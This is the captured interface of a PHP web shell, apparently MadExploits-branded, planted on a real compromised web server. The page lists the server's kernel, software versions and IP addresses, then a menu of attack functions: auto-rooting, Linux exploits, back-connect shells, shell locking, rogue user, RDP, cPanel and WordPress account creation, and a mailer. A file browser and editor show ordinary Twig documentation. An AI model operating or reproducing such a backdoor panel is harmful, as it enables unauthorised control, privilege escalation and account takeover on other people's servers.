Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
doc /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
constant.rst
540
B
-rw-r--r--
defined.rst
694
B
-rw-r--r--
divisibleby.rst
194
B
-rw-r--r--
empty.rst
579
B
-rw-r--r--
even.rst
159
B
-rw-r--r--
index.rst
145
B
-rw-r--r--
iterable.rst
395
B
-rw-r--r--
null.rst
171
B
-rw-r--r--
odd.rst
156
B
-rw-r--r--
sameas.rst
276
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defined.rst
``defined`` =========== ``defined`` checks if a variable is defined in the current context. This is very useful if you use the ``strict_variables`` option: .. code-block:: jinja {# defined works with variable names #} {% if foo is defined %} ... {% endif %} {# and attributes on variables names #} {% if foo.bar is defined %} ... {% endif %} {% if foo['bar'] is defined %} ... {% endif %} When using the ``defined`` test on an expression that uses variables in some method calls, be sure that they are all defined first: .. code-block:: jinja {% if var is defined and foo.method(var) is defined %} ... {% endif %}
Close